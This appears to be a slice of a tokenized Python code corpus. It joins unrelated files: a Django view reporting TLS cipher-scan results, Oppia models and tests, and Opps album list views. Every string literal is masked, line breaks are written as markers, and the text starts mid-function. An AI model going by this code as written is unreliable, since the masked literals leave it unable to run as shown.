profile_q = Q ( result_entry__common_result = profile ) <EOL> else : <EOL> profile = int ( request . GET . get ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> if profile : <EOL> profile_q = Q ( result_entry__common_result__basic_result = profile ) <EOL> else : <EOL> profile = int ( request . GET . 
get ( "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> if profile : <EOL> profile_q = Q ( result_entry__common_result__fundamental_result = profile ) <EOL> extraparam = { } <EOL> if profile_q : <EOL> extraparam [ "<STR_LIT>" ] = profile_q <EOL> result = summary . GetAnalyze ( filter = dict ( [ ( Results . ResultSummaryList . QUERY_CONDITION , form . cleaned_data [ "<STR_LIT>" ] ) , <EOL> ( Results . ResultSummaryList . QUERY_ALEXA_RESTRICT , alexagroup ) , <EOL> ] + <EOL> ( [ ( Results . ResultSummaryList . QUERY_PROTOCOL_RESTRICT , protocol ) ] if protocol else [ ] ) + <EOL> ( [ ( Results . ResultSummaryList . QUERY_RESTRICT_RUN , [ x . part_of_run_id for x in form . cleaned_data [ "<STR_LIT>" ] ] ) ] if form . cleaned_data [ "<STR_LIT>" ] else [ ] ) + <EOL> ( [ ( Results . ResultSummaryList . QUERY_CIPHER , ciphers ) ] if ciphers else [ ] ) + <EOL> ( [ ( Results . ResultSummaryList . QUERY_CIPHER_EXCLUDE , ciphers_ex ) ] if ciphers_ex else [ ] ) <EOL> ) , <EOL> summaries = { <EOL> "<STR_LIT:data>" : ( [ summary_entry ] if summary_entry != "<STR_LIT>" else [ ] ) , <EOL> } , <EOL> ** extraparam <EOL> ) <EOL> value_fun = { <EOL> Results . ResultSummaryList . RESULT_HOSTS : lambda x : x . servername . full_servername , <EOL> Results . ResultSummaryList . RESULT_HOSTS_ALEXA : lambda x : x . servername . full_servername , <EOL> Results . ResultSummaryList . RESULT_URLS_TEXT : lambda x : x . servername . full_servername , <EOL> Results . ResultSummaryList . RESULT_HOST_RUNLIST : lambda x : ( x . servername . servername , x . servername . port ) , <EOL> Results . ResultSummaryList . RESULT_CONDITION : lambda x : dict ( Results . ResultCondition . RESULTC_VALUES ) [ x . condition ] , <EOL> Results . ResultSummaryList . RESULT_DOMAIN : lambda x : x . full_domain_name , <EOL> Results . ResultSummaryList . RESULT_IP : lambda x : x . full_ip_mask , <EOL> Results . ResultSummaryList . RESULT_PRIMARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . 
RESULT_SHORTPRIMARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . RESULT_SECONDARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . RESULT_SHORTSECONDARYAGENT : lambda x : x . agent_name , <EOL> Results . ResultSummaryList . RESULT_CIPHER : lambda x : x . ciphername , <EOL> Results . ResultSummaryList . RESULT_CIPHERGROUP : lambda x : "<STR_LIT:U+0020>" . join ( sorted ( [ y . ciphername for y in x . cipher_suites . cipher_suites . all ( ) ] ) ) , <EOL> Results . ResultSummaryList . RESULT_PROTOCOLS : lambda x : dict ( Results . ResultCondition . RESULTC_VALUES ) [ x . condition ] , <EOL> Results . ResultSummaryList . RESULT_HOST_PROFILES : lambda x : x . key , <EOL> Results . ResultSummaryList . RESULT_HOST_BASEPROFILES : lambda x : x . key , <EOL> Results . ResultSummaryList . RESULT_HOST_FUNDPROFILES : lambda x : x . key , <EOL> } [ summary_entry ] if summary_entry != "<STR_LIT>" else None <EOL> data = result . get ( "<STR_LIT:data>" , [ ] ) if summary_entry != "<STR_LIT>" else [ ] <EOL> if not data : <EOL> data = [ ] <EOL> entries = [ ( <EOL> value_fun ( x ) , <EOL> x . filtered_count , <EOL> x . total_count , <EOL> ( float ( x . filtered_count ) / float ( x . total_count ) if x . total_count else <NUM_LIT:0> ) * <NUM_LIT:100> , <EOL> x , <EOL> ) <EOL> for x in data <EOL> ] <EOL> if summary_entry in [ Results . ResultSummaryList . RESULT_HOSTS_ALEXA , Results . ResultSummaryList . RESULT_URLS_TEXT , Results . ResultSummaryList . RESULT_HOST_RUNLIST ] : <EOL> entries . sort ( key = lambda x : ( x [ - <NUM_LIT:1> ] . servername . alexa_rating if x [ - <NUM_LIT:1> ] . servername . alexa_rating > <NUM_LIT:0> else <NUM_LIT> , x [ - <NUM_LIT:1> ] . servername . full_servername ) ) <EOL> else : <EOL> entries . sort ( key = lambda x : ( - x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) ) <EOL> if summary_entry == Results . ResultSummaryList . 
RESULT_URLS_TEXT : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> for x in entries : <EOL> response . write ( '<STR_LIT>' + x [ - <NUM_LIT:1> ] . servername . servername + "<STR_LIT::>" + str ( x [ - <NUM_LIT:1> ] . servername . port ) + '<STR_LIT>' ) <EOL> return response <EOL> elif summary_entry == Results . ResultSummaryList . RESULT_HOST_RUNLIST : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> import csv <EOL> writer = csv . writer ( response ) <EOL> i = <NUM_LIT:0> <EOL> for x in entries : <EOL> i += <NUM_LIT:1> <EOL> writer . writerow ( [ i ] + list ( x [ <NUM_LIT:0> ] ) ) <EOL> return response <EOL> elif summary_entry in [ Results . ResultSummaryList . RESULT_HOST_PROFILES , Results . ResultSummaryList . RESULT_HOST_BASEPROFILES , Results . ResultSummaryList . RESULT_HOST_FUNDPROFILES ] : <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : summary . part_of_run_id , <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : ( float ( result [ "<STR_LIT>" ] ) / float ( result [ "<STR_LIT>" ] ) if result [ "<STR_LIT>" ] else <NUM_LIT:0> ) * <NUM_LIT:100> , <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT>" : [ x for x in connection . queries ] , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : summary_entry == Results . ResultSummaryList . RESULT_HOSTS_ALEXA , <EOL> "<STR_LIT>" : ( float ( result [ "<STR_LIT>" ] ) / float ( result [ "<STR_LIT>" ] ) if result [ "<STR_LIT>" ] else <NUM_LIT:0> ) * <NUM_LIT:100> , <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT>" : [ x for x in connection . queries ] , <EOL> } ) <EOL> else : <EOL> return SearchResults ( request , method = request . 
method ) <EOL> def SearchResults ( request , method = "<STR_LIT:POST>" ) : <EOL> """<STR_LIT>""" <EOL> form = ResultForm ( ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> "<STR_LIT:root>" : os . environ . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : method if method in [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] else "<STR_LIT:POST>" , <EOL> '<STR_LIT>' : form , <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> from core import jobs <EOL> from core . platform import models <EOL> ( email_models , ) = models . Registry . import_models ( [ models . NAMES . email ] ) <EOL> class EmailHashRegenerationOneOffJob ( jobs . BaseMapReduceJobManager ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def entity_classes_to_map_over ( cls ) : <EOL> return [ email_models . SentEmailModel ] <EOL> @ staticmethod <EOL> def map ( email_model ) : <EOL> email_model . put ( ) <EOL> @ staticmethod <EOL> def reduce ( email_model_id , value ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import inspect <EOL> from extensions . objects . models import objects <EOL> class Registry ( object ) : <EOL> """<STR_LIT>""" <EOL> objects_dict = { } <EOL> @ classmethod <EOL> def _refresh_registry ( cls ) : <EOL> cls . objects_dict . clear ( ) <EOL> for name , clazz in inspect . getmembers ( objects , inspect . isclass ) : <EOL> if name . endswith ( '<STR_LIT>' ) or name == '<STR_LIT>' : <EOL> continue <EOL> ancestor_names = [ <EOL> base_class . __name__ for base_class in inspect . getmro ( clazz ) ] <EOL> if '<STR_LIT>' not in ancestor_names : <EOL> continue <EOL> cls . objects_dict [ clazz . __name__ ] = clazz <EOL> @ classmethod <EOL> def get_all_object_classes ( cls ) : <EOL> """<STR_LIT>""" <EOL> cls . _refresh_registry ( ) <EOL> return copy . deepcopy ( cls . objects_dict ) <EOL> @ classmethod <EOL> def get_object_class_by_type ( cls , obj_type ) : <EOL> """<STR_LIT>""" <EOL> if obj_type not in cls . objects_dict : <EOL> cls . _refresh_registry ( ) <EOL> if obj_type not in cls . objects_dict : <EOL> raise TypeError ( '<STR_LIT>' % obj_type ) <EOL> return cls . objects_dict [ obj_type ] <EOL> def get_all_object_editor_js_templates ( ) : <EOL> """<STR_LIT>""" <EOL> object_editors_js = '<STR_LIT>' <EOL> all_object_classes = Registry . get_all_object_classes ( ) <EOL> for obj_cls in all_object_classes . values ( ) : <EOL> if obj_cls . has_editor_js_template ( ) : <EOL> object_editors_js += obj_cls . get_editor_js_template ( ) <EOL> return object_editors_js </s>
<s> from core . domain import exp_services <EOL> from core . domain import exp_services_test <EOL> from core . domain import rights_manager <EOL> from core . domain import summary_services <EOL> from core . domain import user_services <EOL> import feconf <EOL> class ExplorationDisplayableSummaries ( <EOL> exp_services_test . ExplorationServicesUnitTests ) : <EOL> """<STR_LIT>""" <EOL> ALBERT_EMAIL = '<STR_LIT>' <EOL> BOB_EMAIL = '<STR_LIT>' <EOL> ALBERT_NAME = '<STR_LIT>' <EOL> BOB_NAME = '<STR_LIT>' <EOL> USER_C_NAME = '<STR_LIT:c>' <EOL> USER_D_NAME = '<STR_LIT:d>' <EOL> USER_C_EMAIL = '<STR_LIT>' <EOL> USER_D_EMAIL = '<STR_LIT>' <EOL> USER_C_PROFILE_PICTURE = '<STR_LIT>' <EOL> EXP_ID_1 = '<STR_LIT>' <EOL> EXP_ID_2 = '<STR_LIT>' <EOL> EXP_ID_3 = '<STR_LIT>' <EOL> EXP_ID_4 = '<STR_LIT>' <EOL> EXP_ID_5 = '<STR_LIT>' <EOL> EXPECTED_VERSION_1 = <NUM_LIT:4> <EOL> EXPECTED_VERSION_2 = <NUM_LIT:2> <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ExplorationDisplayableSummaries , self ) . setUp ( ) <EOL> self . albert_id = self . get_user_id_from_email ( self . ALBERT_EMAIL ) <EOL> self . bob_id = self . get_user_id_from_email ( self . BOB_EMAIL ) <EOL> self . signup ( self . ALBERT_EMAIL , self . ALBERT_NAME ) <EOL> self . signup ( self . BOB_EMAIL , self . BOB_NAME ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_1 , self . albert_id ) <EOL> exp_services . update_exploration ( <EOL> self . bob_id , self . EXP_ID_1 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_2 , self . albert_id ) <EOL> exp_services . update_exploration ( <EOL> self . albert_id , self . EXP_ID_1 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> exp_services . update_exploration ( <EOL> self . albert_id , self . 
EXP_ID_2 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> exp_services . revert_exploration ( self . bob_id , self . EXP_ID_1 , <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> with self . assertRaisesRegexp ( <EOL> Exception , '<STR_LIT>' <EOL> ) : <EOL> rights_manager . publish_exploration ( self . bob_id , self . EXP_ID_2 ) <EOL> rights_manager . publish_exploration ( self . albert_id , self . EXP_ID_2 ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_3 , self . albert_id ) <EOL> rights_manager . publish_exploration ( self . albert_id , self . EXP_ID_3 ) <EOL> exp_services . delete_exploration ( self . albert_id , self . EXP_ID_3 ) <EOL> self . user_c_id = self . get_user_id_from_email ( self . USER_C_EMAIL ) <EOL> self . user_d_id = self . get_user_id_from_email ( self . USER_D_EMAIL ) <EOL> self . signup ( self . USER_C_EMAIL , self . USER_C_NAME ) <EOL> self . signup ( self . USER_D_EMAIL , self . USER_D_NAME ) <EOL> user_services . update_profile_picture_data_url ( <EOL> self . user_c_id , self . USER_C_PROFILE_PICTURE ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_4 , self . user_c_id ) <EOL> exp_services . update_exploration ( <EOL> self . user_d_id , self . EXP_ID_4 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> exp_services . update_exploration ( <EOL> self . user_d_id , self . EXP_ID_4 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_5 , self . bob_id ) <EOL> def test_get_human_readable_contributors_summary ( self ) : <EOL> contributors_summary = { self . albert_id : <NUM_LIT:10> , self . bob_id : <NUM_LIT> } <EOL> self . assertEqual ( { <EOL> self . 
ALBERT_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> self . BOB_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None <EOL> } <EOL> } , summary_services . get_human_readable_contributors_summary ( <EOL> contributors_summary ) ) <EOL> contributors_summary = { self . user_c_id : <NUM_LIT:1> , self . user_d_id : <NUM_LIT:2> } <EOL> self . assertEqual ( { <EOL> self . USER_C_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : self . USER_C_PROFILE_PICTURE <EOL> } , <EOL> self . USER_D_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : None <EOL> } <EOL> } , summary_services . get_human_readable_contributors_summary ( <EOL> contributors_summary ) ) <EOL> def test_get_displayable_exp_summary_dicts_matching_ids ( self ) : <EOL> displayable_summaries = ( <EOL> summary_services . get_displayable_exp_summary_dicts_matching_ids ( <EOL> [ self . EXP_ID_1 , self . EXP_ID_2 , self . EXP_ID_3 , self . EXP_ID_5 ] ) ) <EOL> expected_summary = { <EOL> '<STR_LIT:status>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : feconf . DEFAULT_LANGUAGE_CODE , <EOL> '<STR_LIT>' : { <EOL> self . ALBERT_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : None <EOL> } <EOL> } , <EOL> '<STR_LIT:id>' : self . EXP_ID_2 , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : feconf . get_empty_ratings ( ) , <EOL> '<STR_LIT:title>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : u'<STR_LIT>' <EOL> } <EOL> self . assertIn ( '<STR_LIT>' , displayable_summaries [ <NUM_LIT:0> ] ) <EOL> self . assertDictContainsSubset ( expected_summary , <EOL> displayable_summaries [ <NUM_LIT:0> ] ) <EOL> def test_get_public_and_filtered_private_summary_dicts_for_creator ( self ) : <EOL> displayable_summaries = ( <EOL> summary_services . get_displayable_exp_summary_dicts_matching_ids ( <EOL> [ self . 
EXP_ID_1 , self . EXP_ID_2 , self . EXP_ID_3 , self . EXP_ID_5 ] , <EOL> editor_user_id = self . albert_id ) ) <EOL> self . assertEqual ( len ( displayable_summaries ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , self . EXP_ID_1 ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:1> ] [ '<STR_LIT:id>' ] , self . EXP_ID_2 ) <EOL> rights_manager . assign_role_for_exploration ( <EOL> self . bob_id , self . EXP_ID_5 , self . albert_id , <EOL> rights_manager . ROLE_EDITOR ) <EOL> displayable_summaries = ( <EOL> summary_services . get_displayable_exp_summary_dicts_matching_ids ( <EOL> [ self . EXP_ID_1 , self . EXP_ID_2 , self . EXP_ID_3 , self . EXP_ID_5 ] , <EOL> editor_user_id = self . albert_id ) ) <EOL> self . assertEqual ( len ( displayable_summaries ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:0> ] [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , self . EXP_ID_1 ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:1> ] [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:1> ] [ '<STR_LIT:id>' ] , self . EXP_ID_2 ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:2> ] [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:2> ] [ '<STR_LIT:id>' ] , self . EXP_ID_5 ) </s>
<s> """<STR_LIT>""" <EOL> from core . platform import models <EOL> import feconf <EOL> import utils <EOL> from google . appengine . ext import ndb <EOL> ( base_models , ) = models . Registry . import_models ( [ models . NAMES . base_model ] ) <EOL> class FileMetadataSnapshotMetadataModel ( base_models . BaseSnapshotMetadataModel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileMetadataSnapshotContentModel ( base_models . BaseSnapshotContentModel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileMetadataModel ( base_models . VersionedModel ) : <EOL> """<STR_LIT>""" <EOL> SNAPSHOT_METADATA_CLASS = FileMetadataSnapshotMetadataModel <EOL> SNAPSHOT_CONTENT_CLASS = FileMetadataSnapshotContentModel <EOL> size = ndb . IntegerProperty ( indexed = False ) <EOL> @ classmethod <EOL> def get_new_id ( cls , entity_name ) : <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def get_undeleted ( cls ) : <EOL> return cls . get_all ( ) . filter ( cls . deleted == False ) . fetch ( <EOL> feconf . DEFAULT_QUERY_LIMIT ) <EOL> @ classmethod <EOL> def _construct_id ( cls , exploration_id , filepath ) : <EOL> return utils . vfs_construct_path ( '<STR_LIT:/>' , exploration_id , filepath ) <EOL> @ classmethod <EOL> def create ( cls , exploration_id , filepath ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return cls ( id = model_id , deleted = False ) <EOL> @ classmethod <EOL> def get_model ( cls , exploration_id , filepath , strict = False ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return super ( FileMetadataModel , cls ) . get ( model_id , strict = strict ) <EOL> @ classmethod <EOL> def get_version ( cls , exploration_id , filepath , version_number ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return super ( FileMetadataModel , cls ) . 
get_version ( <EOL> model_id , version_number ) <EOL> def commit ( self , committer_id , commit_cmds ) : <EOL> return super ( FileMetadataModel , self ) . commit ( <EOL> committer_id , '<STR_LIT>' , commit_cmds ) <EOL> class FileSnapshotMetadataModel ( base_models . BaseSnapshotMetadataModel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileSnapshotContentModel ( base_models . BaseSnapshotContentModel ) : <EOL> """<STR_LIT>""" <EOL> content = ndb . BlobProperty ( indexed = False ) <EOL> class FileModel ( base_models . VersionedModel ) : <EOL> """<STR_LIT>""" <EOL> SNAPSHOT_METADATA_CLASS = FileSnapshotMetadataModel <EOL> SNAPSHOT_CONTENT_CLASS = FileSnapshotContentModel <EOL> content = ndb . BlobProperty ( indexed = False ) <EOL> def _reconstitute ( self , snapshot_blob ) : <EOL> """<STR_LIT>""" <EOL> self . content = snapshot_blob <EOL> return self <EOL> def _compute_snapshot ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . content <EOL> @ classmethod <EOL> def get_new_id ( cls , entity_name ) : <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def _construct_id ( cls , exploration_id , filepath ) : <EOL> return utils . vfs_construct_path ( '<STR_LIT:/>' , exploration_id , filepath ) <EOL> @ classmethod <EOL> def create ( cls , exploration_id , filepath ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return cls ( id = model_id , deleted = False ) <EOL> @ classmethod <EOL> def get_model ( cls , exploration_id , filepath , strict = False ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return super ( FileModel , cls ) . get ( model_id , strict = strict ) <EOL> def commit ( self , committer_id , commit_cmds ) : <EOL> return super ( FileModel , self ) . commit ( committer_id , '<STR_LIT>' , commit_cmds ) <EOL> @ classmethod <EOL> def get_version ( cls , exploration_id , filepath , version_number ) : <EOL> model_id = cls . 
_construct_id ( exploration_id , filepath ) <EOL> return super ( FileModel , cls ) . get_version ( model_id , version_number ) </s>
from extensions.interactions import base


class MusicNotesInput(base.BaseInteraction):
    """<STR_LIT>"""
    # Declarative configuration only: all behavior lives in
    # base.BaseInteraction; this class just supplies metadata.

    # Display name and description shown to exploration editors.
    name = '<STR_LIT>'
    description = (
        '<STR_LIT>'
        '<STR_LIT>')
    # Rendered in the supplemental (below-content) display area.
    display_mode = base.DISPLAY_MODE_SUPPLEMENTAL
    # Frontend dependency bundle(s) this interaction needs at runtime.
    _dependency_ids = ['<STR_LIT>']
    # Type tag used to route learner answers to the matching rule set.
    answer_type = '<STR_LIT>'
    # Instruction strings for normal and narrow (mobile) layouts.
    instructions = '<STR_LIT>'
    narrow_instructions = '<STR_LIT>'
    # A summary of the learner's answer is shown after submission.
    needs_summary = True
    # Editor-configurable arguments; each entry: name, description,
    # schema (type + placeholder field), and default value (empty list).
    _customization_arg_specs = [{
        '<STR_LIT:name>': '<STR_LIT>',
        '<STR_LIT:description>': '<STR_LIT>',
        '<STR_LIT>': {
            '<STR_LIT:type>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        },
        '<STR_LIT>': [],
    }, {
        '<STR_LIT:name>': '<STR_LIT>',
        '<STR_LIT:description>': '<STR_LIT>',
        '<STR_LIT>': {
            '<STR_LIT:type>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        },
        '<STR_LIT>': [],
    }]
<s> """<STR_LIT>""" <EOL> from core . tests import test_utils <EOL> from extensions . rules import normalized_string <EOL> class NormalizedStringRuleUnitTests ( test_utils . GenericTestBase ) : <EOL> """<STR_LIT>""" <EOL> def test_equals_rule ( self ) : <EOL> rule = normalized_string . Equals ( '<STR_LIT:hello>' ) <EOL> self . assertFuzzyTrue ( rule . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( rule . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( rule . eval ( '<STR_LIT>' ) ) <EOL> def test_case_sensitive_equals_rule ( self ) : <EOL> rule = normalized_string . CaseSensitiveEquals ( '<STR_LIT:hello>' ) <EOL> self . assertFuzzyTrue ( rule . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyFalse ( rule . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( rule . eval ( '<STR_LIT>' ) ) <EOL> def test_starts_with_rule ( self ) : <EOL> self . assertFuzzyTrue ( normalized_string . StartsWith ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( normalized_string . StartsWith ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyFalse ( normalized_string . StartsWith ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> def test_contains_rule ( self ) : <EOL> self . assertFuzzyTrue ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyFalse ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> def test_fuzzy_equals_rule ( self ) : <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . 
FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) </s>
from django.contrib.sites.models import get_current_site
from django.utils import timezone
from django.conf import settings

from opps.views.generic.list import ListView
from opps.containers.views import ContainerList
from opps.containers.models import Container, ContainerBox
from opps.articles.models import Album


class AlbumList(ContainerList):
    # List view for Album containers within a channel.
    model = Album
    type = '<STR_LIT>'

    def get_template_names(self):
        # Build the candidate template list: the model's default list
        # template, plus a paginated variant when the request carries the
        # pagination GET parameter and this view class is not opted out
        # via settings.OPPS_PAGINATE_NOT_APP.
        templates = []
        domain_folder = self.get_template_folder()
        list_name = '<STR_LIT:list>'
        templates.append('<STR_LIT>'.format(
            self.model._meta.app_label,
            self.model._meta.module_name, list_name))
        if self.request.GET.get('<STR_LIT>') and self.__class__.__name__ not in settings.OPPS_PAGINATE_NOT_APP:
            templates.append('<STR_LIT>'.format(
                domain_folder, self.model._meta.app_label,
                self.model._meta.module_name, list_name))
        return templates

    def get_queryset(self):
        # Resolve site and channel slug; bail out with None when no slug
        # is available (caller is expected to handle None).
        self.site = get_current_site(self.request)
        self.long_slug = self.get_long_slug()
        if not self.long_slug:
            return None
        self.set_channel_rules()
        self.articleboxes = ContainerBox.objects.filter(
            channel__long_slug=self.long_slug)
        is_paginated = self.page_kwarg in self.request.GET
        # On the first (unpaginated) page, exclude containers already
        # rendered inside the channel's boxes to avoid duplicates.
        if not is_paginated:
            for box in self.articleboxes:
                self.excluded_ids.update(
                    [a.pk for a in box.ordered_containers()])
        filters = {}
        filters['<STR_LIT>'] = self.site.domain
        filters['<STR_LIT>'] = timezone.now()
        filters['<STR_LIT>'] = True
        filters['<STR_LIT>'] = '<STR_LIT>'
        # Extra filter applies only on a root channel's first page.
        if self.channel and self.channel.is_root_node() and not is_paginated:
            filters['<STR_LIT>'] = True
        queryset = Container.objects.filter(
            **filters).exclude(pk__in=self.excluded_ids)
        # _clone() returns a fresh queryset so later consumers do not
        # share this instance's result cache.
        return queryset._clone()


class AlbumChannelList(ListView):
    # Cross-channel Album listing.
    model = Album
    type = '<STR_LIT>'
    template_name_suffix = '<STR_LIT>'

    def get_template_list(self, domain_folder="<STR_LIT>"):
        # Build an ordered list of candidate templates, most specific
        # first: parent channel (for grouped channels), current channel,
        # each ancestor channel (nearest first), then generic fallbacks.
        # Paginated variants are interleaved when the pagination GET
        # parameter is present and this class is not in
        # settings.OPPS_PAGINATE_NOT_APP.
        templates = []
        list_name = '<STR_LIT:list>'
        if self.template_name_suffix:
            # NOTE(review): list_fullname is only bound when
            # template_name_suffix is truthy; later uses would raise
            # NameError otherwise. The class attribute above makes this
            # safe here, but subclasses clearing it would break this.
            list_fullname = "<STR_LIT>".format(self.template_name_suffix,
                                               list_name)
        if self.channel:
            if self.channel.group and self.channel.parent:
                templates.append('<STR_LIT>'.format(
                    domain_folder,
                    self.channel.parent.long_slug,
                    list_fullname))
                if self.request.GET.get('<STR_LIT>') and self.__class__.__name__ not in settings.OPPS_PAGINATE_NOT_APP:
                    templates.append('<STR_LIT>'.format(
                        domain_folder, self.channel.parent.long_slug,
                        list_fullname))
